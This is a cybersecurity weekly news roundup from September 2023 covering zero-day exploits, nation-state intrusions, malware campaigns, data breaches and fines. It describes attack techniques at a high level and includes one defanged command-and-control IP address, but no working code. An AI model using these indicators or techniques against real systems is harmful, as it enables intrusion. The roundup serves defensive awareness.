Thursday, September 7th, 2023
Cybersecurity Week in Review (08/09/2023)
Apple Zero-click iMessage Exploit Used to Infect iPhones With Spyware
Citizen Lab says two zero-days fixed by Apple today in emergency security updates were actively abused as part of a zero-click exploit chain to deploy NSO Group’s Pegasus commercial spyware onto fully patched iPhones.
The two bugs, tracked as CVE-2023-41064 and CVE-2023-41061, allowed the attackers to infect a fully-patched iPhone running iOS 16.6 and belonging to a Washington DC-based civil society organization via PassKit attachments containing malicious images.
“We refer to the exploit chain as BLASTPASS. The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim,” Citizen Lab said.
“The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim.”
Citizen Lab also urged Apple customers to update their devices immediately and encouraged those at risk of targeted attacks due to their identity or profession to activate Lockdown Mode.
Apple and Citizen Lab security researchers discovered the two zero-days in the Image I/O and Wallet frameworks.
CVE-2023-41064 is a buffer overflow triggered when processing maliciously crafted images, while CVE-2023-41061 is a validation issue that can be exploited via malicious attachments.
Both allow threat actors to gain arbitrary code execution on unpatched iPhone and iPad devices.
Apple addressed the flaws in macOS Ventura 13.5.2, iOS 16.6.1, iPadOS 16.6.1, and watchOS 9.6.2 with improved logic and memory handling.
The list of affected devices includes:
• iPhone 8 and later
• iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
• Macs running macOS Ventura
• Apple Watch Series 4 and later
Since the start of the year, Apple has fixed a total of 13 zero-days exploited to target devices running iOS, macOS, iPadOS, and watchOS, including:
• two zero-days (CVE-2023-37450 and CVE-2023-38606) in July
• three zero-days (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439) in June
• three more zero-days (CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373) in May
• two zero-days (CVE-2023-28206 and CVE-2023-28205) in April
• and another WebKit zero-day (CVE-2023-23529) in February
Source – https://www.bleepingcomputer.com/news/security/apple-zero-click-imessage-exploit-used-to-infect-iphones-with-spyware/
Outlook Breach: Microsoft Reveals How a Crash Dump Led to a Major Security Breach
Microsoft on Wednesday revealed that a China-based threat actor known as Storm-0558 acquired the inactive consumer signing key to forging tokens to access Outlook by compromising an engineer’s corporate account. This enabled the adversary to access a debugging environment that contained a crash dump of the consumer signing system that took place in April 2021 and steal the key.
“A consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process (‘crash dump’),” the Microsoft Security Response Center (MSRC) said in a post-mortem report.
“The crash dumps, which redact sensitive information, should not include the signing key. In this case, a race condition allowed the key to be present in the crash dump. The key material’s presence in the crash dump was not detected by our systems.”
The Windows maker said the crash dump was moved to a debugging environment on the internet-connected corporate network, from where Storm-0558 is suspected to have acquired the key after infiltrating the engineer’s corporate account. It’s not currently not known if this is the exact mechanism that was adopted by the threat actor since Microsoft noted it does not have logs that offer concrete proof of the exfiltration due to its log retention policies.
Microsoft’s report further alludes to spear-phishing and the deployment of token-stealing malware, but it did not elaborate on the modus operandi of how the engineer’s account was breached in the first place, if other corporate accounts were hacked, and when it became aware of the compromise.
That said, the latest development offers insight into a series of cascading security mishaps that culminated in the signing key ending up in the hands of a skilled actor with a “high degree of technical tradecraft and operational security.”
Storm-0558 is the moniker assigned by Microsoft to a hacking group that has been linked to the breach of approximately 25 organizations using the consumer signing key and obtaining unauthorized access to Outlook Web Access (OWA) and Outlook.com.
The zero-day issue was blamed on a validation error that allowed the key to be trusted for signing Azure AD tokens. Evidence shows that the malicious cyber activity commenced a month earlier before it was detected in June 2023. This, in turn, was made possible because the “mail system would accept a request for enterprise email using a security token signed with the consumer key.” The “issue” has since been rectified by Microsoft.
Phishing Campaigns Deliver New SideTwist Backdoor and Agent Tesla Variant
The Iranian threat actor tracked as APT34 has been linked to a new phishing attack that leads to the deployment of a variant of a backdoor called SideTwist. APT34 has a high level of attack technology, can design different intrusion methods for different types of targets, and has supply chain attack capability.
Also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, APT34 has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East since at least 2014 via spear-phishing lures that culminate in the deployment of various backdoors.
One of the key traits of the hacking outfit is its ability to create new and updated tools to minimize the odds of detection and gain a foothold on compromised hosts for extended periods of time. SideTwist was first documented as used by APT34 in April 2021, with an implant capable of file download/upload and command execution.
The attack chain starts with a bait Microsoft Word document that embeds within a malicious macro, which, in turn, extracts and launches the Base64-encoded payload stored in the file. The payload is a variant of SideTwist that’s compiled using GCC and establishes communication with a remote server (11.0.188[.]38) to receive further commands.
The development comes as a phishing campaign was identified that spreads a new Agent Tesla variant using a specially crafted Microsoft Excel document that exploits CVE-2017-11882, a six-year-old memory corruption vulnerability in Microsoft Office’s Equation Editor, and CVE-2018-0802.
According to data CVE-2017-11882 remains one of the most favored flaws to date, exploited by 467 malware, 53 threat actors, and 14 ransomware as recently as August 31, 2023. It also follows the discovery of another phishing attack that has been found to employ ISO image file lures to launch malware strains such as Agent Tesla, LimeRAT, and Remcos RAT on infected hosts.
Ukraine’s CERT Thwarts APT28’s Cyberattack on Critical Energy Infrastructure
The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain.
“Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file ‘weblinks.cmd’ to the victim’s computer,” CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE).
“When a CMD file is run, several decoy web pages will be opened, .bat and .vbs files will be created, and a VBS file will be launched, which in turn will execute the BAT file.”
The next phase of the attack involves running the “whoami” command on the compromised host and exfiltrating the information, alongside downloading the TOR hidden service to route malicious traffic.
Persistence is achieved by means of a scheduled task and remote command execution is implemented using cURL through a legitimate service called webhook.site, which was recently disclosed as used by a threat actor known as Dark Pink.
CERT-UA said the attack was ultimately unsuccessful owing to the fact that access to Mocky and the Windows Script Host (wscript.exe) was restricted. It’s worth noting that APT28 has been linked to the use of Mocky APIs in the past.
The disclosure comes amid continued phishing attacks targeting Ukraine, some of which have been observed leveraging an off-the-shelf malware obfuscation engine named ScruptCrypt to distribute AsyncRAT.
Another cyber assault mounted by GhostWriter (aka UAC-0057 or UNC1151) is said to have weaponized a recently disclosed zero-day flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike, the agency said.
7 Million Users Possibly Impacted by Freecycle Data Breach
Freecycle.org, a platform that allows users to recycle their belongings, has prompted millions of users to reset their passwords after their credentials were compromised in a data breach. The non-profit organization, which is based in the US but operates in the UK as well, says it identified the incident on August 30, and it has started sending notifications to its users.
“The breach of data includes usernames, User IDs, email addresses and passwords,” Freecycle says in an incident notice on its website. The passwords were hashed, the platform said in the email notification sent to users, a copy of which was posted on social media.
According to the organization, no other personal information aside from the exposed credentials was compromised during the incident.
“We are advising all members to change their passwords as soon as possible. We apologize for the inconvenience and would ask that you watch this space for further pending background,” a message from Freecycle Network’s executive director Deron Beal reads.
The organization provides detailed instructions on how users can reset their passwords and advises them to make sure that any reused passwords are reset on all other online platforms as well.
Following the data breach, Freecycle says, users might start receiving more spam in their mailboxes. The leaked data may also be used in phishing attacks. What the organization has not revealed, however, was how the attackers gained access to its systems or how many of its approximately 11 million users might be impacted.
According to screenshots that the alleged Freecycle hacker posted two months ago, more than 7 million individuals might have been affected by the incident. The hacker reportedly used stolen credentials to access the data. Freecycle says it has informed the relevant authorities in the UK and the US about the data breach.
New Python Variant of Chaes Malware Targets Banking and Logistics Industries
Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. Chaes, which first emerged in 2020, is known to target e-commerce customers in Latin America, particularly Brazil, to steal sensitive financial information.
It has undergone major overhauls: from being rewritten entirely in Python, resulting in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol.
Analysis in early 2022 found that the threat actors behind the operation, who call themselves Lucifer, had breached more than 800 WordPress websites to deliver Chaes to users of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago.
Further updates were detected in December 2022, when the malware’s use of Windows Management Instrumentation (WMI) was detected in its infection chain to facilitate the collection of system metadata, such as BIOS, processor, disk size, and memory information.
The latest iteration of the malware, dubbed Chae$ 4 in reference to debug log messages present in the source code, packs in “significant transformations and enhancements,” including an expanded catalog of services targeted for credential theft as well as clipper functionalities.
Despite the changes in the malware architecture, the overall delivery mechanism has remained the same in attacks that were identified in January 2023.
Potential victims landing on one of the compromised websites are greeted by a pop-up message asking them to download an installer for Java Runtime or an antivirus solution, triggering the deployment of a malicious MSI file that, in turn, launches a primary orchestrator module known as ChaesCore.
The component is responsible for establishing a communication channel with the command-and-control (C2) server from where it fetches additional modules that support post-compromise activity and data theft. Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server.
The targeting of cryptocurrency transfers and instant payments via Brazils’ PIX platform is a noteworthy addition that underscores the threat actors’ financial motivations. The Chronod module introduces another component used in the framework, a component called Module Packer. This component provides the module its own persistence and migration mechanisms, working much like the ChaesCore’s one.
This method involves altering all shortcut files (LNK) associated with web browsers (e.g., Google Chrome, Microsoft Edge, Brave, and Avast Secure Browser) to execute the Chronod module instead of the actual browser.
UK Election Body Failed Cybersecurity Test Before Hack
The United Kingdom Electoral Commission failed a basic cybersecurity test at around the same time it was hacked, a whistleblower revealed to the BBC. The commission previously disclosed a data breach that exposed the personal details of anybody who was registered to vote in the country between 2014 and 2022, around 40 million voters.
Now, a whistleblower has told the BBC that the commission was given an automatic fail during a Cyber Essentials audit. The commission confirmed the claim and said that it had still not passed the test. According to the BBC, in the same month that hackers were breaking into the organization, the commission was told by cybersecurity auditors that it was not compliant with the Cyber Essentials scheme.
A spokeswoman for the Electoral Commission admitted the failings to the BBC but claims they weren’t linked to the cyber-attack that impacted email servers.
The attackers had access to the electoral systems for a number of months, indicating they were in search of something other than quick financial gain, which is the most common motive of attacks. The longer an attacker stays undetected in a network – the more damage they can do.
When the hack was announced, the Electoral Commission said that the data hacked from the full electoral register was “largely in the public domain.”
“We don’t know how this data might be used, but according to the risk assessment used by the Information Commissioner’s Office, the personal data held on electoral registers, typically name and address, does not in itself present a high risk to individuals,” the commission said in August.
But the attackers – it’s not yet clear who was responsible for the intrusion – could now potentially spread disinformation to the 40 million UK citizens in the database and amplify disharmony. They can also manipulate the information within these systems in order to create distrust by calling to question the authenticity and accuracy of voter data or even, in the worst case, votes themselves.
The breach and the failure to pass the audit is a reminder that cyber defenses at all public and private organizations need to be reinforced.
Ransomware Attack on Fencing Systems Maker Zaun Impacts UK Military Data
British mesh fencing systems maker Zaun has disclosed a LockBit ransomware attack that potentially led to the compromise of data related to UK military and intelligence sites. Headquartered in Wolverhampton, Zaun specializes in high-security perimeter fencing products used by prisons, military bases, and utilities.
In a data breach notice posted on September 1, Zaun announced that the cyberattack occurred in early August, that it was able to thwart it before data was encrypted, and that its services were not interrupted by the incident. According to the company, although file-encrypting ransomware was not executed on its systems, the LockBit ransomware group did manage to exfiltrate data from the network.
“At the time of the attack, we believed that our cyber-security software had thwarted any transfer of data. However, we can now confirm that during the attack LockBit managed to download some data,” the company says.
Zaun notes that all its fencing products are typically used to “separate the public from the secure asset”, meaning that they are on public display and that the attackers would gain no advantage from the compromised data.
“LockBit will have potentially gained access to some historic emails, orders, drawings and project files, we do not believe that any classified documents were stored on the system or have been compromised. We are in contact with relevant agencies and will keep these updated as more information becomes available,” the company says.
However, Zaun also acknowledges that the ransomware group has since made the stolen data public on the internet. Some of the information appears related to UK military, intelligence, and research bases.
As part of the cyberattack, the LockBit gang first compromised a Windows 7 computer running software for a manufacturing machine, and likely only exfiltrated data from that system, Zaun says.
Active since at least 2020 and operating under the Ransomware-as-a-Service (RaaS) model, LockBit was responsible for roughly one-fifth of the ransomware attacks observed in Australia, Canada, New Zealand, and the US last year, and is believed to have received more than $91 million in ransom payments.
New BLISTER Malware Update Fuelling Stealthy Network Infiltration
An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic.
New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments. BLISTER was first uncovered in December 2021 acting as a conduit to distribute Cobalt Strike and BitRAT payloads on compromised systems.
In these attacks, BLISTER is embedded within a legitimate VLC Media Player library in an attempt to get around security software and infiltrate victim environments.
Both SocGholish and BLISTER have been used in tandem as part of several campaigns, with the latter used as a second-stage loader to distribute Cobalt Strike and LockBit ransomware, as documented in early 2022.
A closer analysis of the malware shows that it’s being actively maintained, with the malware authors incorporating a slew of techniques to fly under the radar and complicate analysis. BLISTER is a loader that continues to stay under the radar, actively being used to load a variety of malware including clipbankers, information stealers, trojans, ransomware, and shellcode.
Insurer Fined $3M for Exposing Data of 650k Clients for Two Years
The Swedish Authority for Privacy Protection (IMY) has fined insurer Trygg-Hansa $3 million for exposing on its online portal sensitive data belonging to hundreds of thousands of customers. Trygg-Hansa is an insurer for individuals, private companies, and public organizations, and also an asset management and investment consultation firm.
IMY initiated an investigation on the firm after receiving a tip from a Moderna Försäkringar (now part of Trygg-Hansa) customer, who had discovered it was possible to access the insurer’s backend by following links available on quotation pages sent to clients.
These are sent to all existing or potential customers via SMS or email, containing a unique web address (URL) to a quote page on Trygg-Hansa’s website.
IMY confirmed that the backend database was accessible without requiring authentication, and they could browse private documents from other individuals by modifying in the URL the client ID number, which was sequential.
About 650,000 customers have been impacted. The information exposed included:
- Personal data
- Health information
- Condition details
- Financial information
- Contact details
- Social security number
- Insurance details
To make matters worse, IMY determined that the data was exposed through Trygg-Hansa’s portal to unauthorized parties for more than two years, between October 2018 and February 2021. Such an extensive exposure period increases the likelihood of someone finding the flaw and exploiting it to collect sensitive information.
This type of data can then be sold to cybercriminals and used for scamming, phishing, or even extorting the exposed individuals. IMY has been able to confirm at least 202 cases of customers who had their personal information exposed to unauthorized users, but this may be the tip of the iceberg.
“The deficiencies have been of such fundamental nature that Trygg-Hansa should have been able to detect and remedy these before the current IT system was introduced and in any case, during the long period the system was used.” – IMY
The insurer’s failure to remedy the issues all this time, even after it received reports about the flaw, according to IMY, indicates a severe shortfall in data security and risk mitigation measures for which the regulator decided to impose an administrative penalty of $3M.
German Financial Agency Site Disrupted by DDoS Attack Since Friday
The German Federal Financial Supervisory Authority (BaFin) announced today that an ongoing distributed denial-of-service (DDoS) attack has been impacting its website since Friday. BaFin is Germany’s financial regulatory authority, part of the Federal Ministry of Finance, responsible for supervising 2,700 banks, 800 financial, and 700 insurance service providers.
The regulator is known for its law enforcement role in Germany and internationally. In recent years, it imposed $10M and $5M fines on the Deutsche Bank and the Bank of America, respectively, for various violations.
The German agency informed today that it has taken all the appropriate security precautions and defensive measures to shield its operations from the hackers. Part of the response measures is to take BaFin’s public website at “bafin.de” offline; however, the organization assures that all other systems, which are crucial for its mission, work without restrictions.
Although some users might be able to access BaFin’s website intermittently, it is mostly unavailable.
BaFin’s public website hosts consumer and regulation information, measures, warnings, and also serves as a space to publish important documents relating to the agency’s investigation activities and findings. Also, the site hosts a database of registered companies and public tenders, a job vacancies space, and a platform for whistleblowers to report violations anonymously. All that has remained inaccessible since Friday.
BaFin says its IT team works intensively to fully restore public access to the website but it cannot estimate when its pages.
It is unclear who is behind the DDoS on the German financial authority but it is possible that pro-Russian hacktivists are responsible for the country’s supportive stance towards Ukraine, which includes financial and military equipment aids.
Chinese-Speaking Cybercriminals Launch Large-Scale iMessage Smishing Campaign in U.S.
A new large-scale smishing campaign is targeting the U.S. by sending iMessages from compromised Apple iCloud accounts with an aim to conduct identity theft and financial fraud.
The Chinese-speaking threat actors behind this campaign are operating a package-tracking text scam sent via iMessage to collect personally identifying information (PII) and payment credentials from victims, in the furtherance of identity theft and credit card fraud.
The cybercrime group, dubbed Smishing Triad, is also said to be in the business of “fraud-as-a-service,” offering other actors ready-to-use smishing kits via Telegram that cost $200 a month. These kits impersonate popular postal and delivery services in the U.S, the U.K, Poland, Sweden, Italy, Indonesia, Malaysia, Japan, and other countries.
A stand-out aspect of the activity is the use of breached Apple iCloud accounts as a delivery vector to send package delivery failure messages, urging recipients to click on a link to reschedule the delivery and enter their credit card information in a fake form.
Analysis of the smishing kit revealed an SQL injection vulnerability that allows them to retrieve over 108,044 records of victims’ data.
Considering the identified vulnerability or potential backdoor, it is possible that key members of ‘Smishing Triad’ organized a covert channel to collect results with intercepted personal and payment data from other members and clients leveraging their kit. Such tradecraft is widely used by cybercriminals in password stealers and phishing kits, allowing them to profit from the activities of their clients, or at least to seamlessly monitor their activity just by logging into an administration panel.
The Telegram group associated with Smishing Triad includes graphic designers, web developers, and sales people, who oversee the development of high-quality phishing kits as well as their marketing on dark web cybercrime forums.
Multiple Vietnamese-speaking members of the group have been observed collaborating with the primary threat actors in these efforts, with the latter also collaborating with similar financially motivated groups to scale their operations.
Package tracking text scams notwithstanding, Smishing Triad is also known to indulge in Magecart-like attacks that infect online shopping platforms with malicious code injections to intercept customer data.
University of Sydney Data Breach Impacts Recent Applicants
The University of Sydney (USYD) announced that a breach at a third-party service provider exposed personal information of recently applied and enrolled international applicants. The public university started operations in 1850 and has nearly 70,000 students and about 8,500 academic and administrative personnel. It is considered one of Australia’s most important educational institutes.
In the data breach announcement, the university says that incident had a limited impact and the preliminary investigation found no evidence that local students, staff, or alumni have been impacted.
“The issue was isolated to a single platform and had no impact on other University systems. There is currently no evidence that any personal information has been misused” – University of Sydney
It is unclear if the intruder picked the time of the attack deliberately or it was an opportunistic endeavor. The university says that those impacted will be contacted and receive the required support to mitigate the risk of exposure.
Regarding the data that the attacker accessed, USYD says it’s still in the process of determining that and urges all international applicants to follow the guidance provided on this web page.
The public disclosure does not clarify when the breach occurred or what third-party service was hacked. At this time, there are no announcements about a disruption in USYD’s systems, however, students should remain vigilant and treat unsolicited communications with caution.
Earlier this week, the University of Michigan announced it had to shut down its operation-critical systems to deal with a serious cybersecurity incident.
In June, the University of Manchester suffered a data breach where hackers stole an undefined amount of data from its networks. Further back in 2023, ransomware gangs attacked and disrupted the operations of the Queensland University of Technology, the Open University of Cyprus, and the Bluefield University.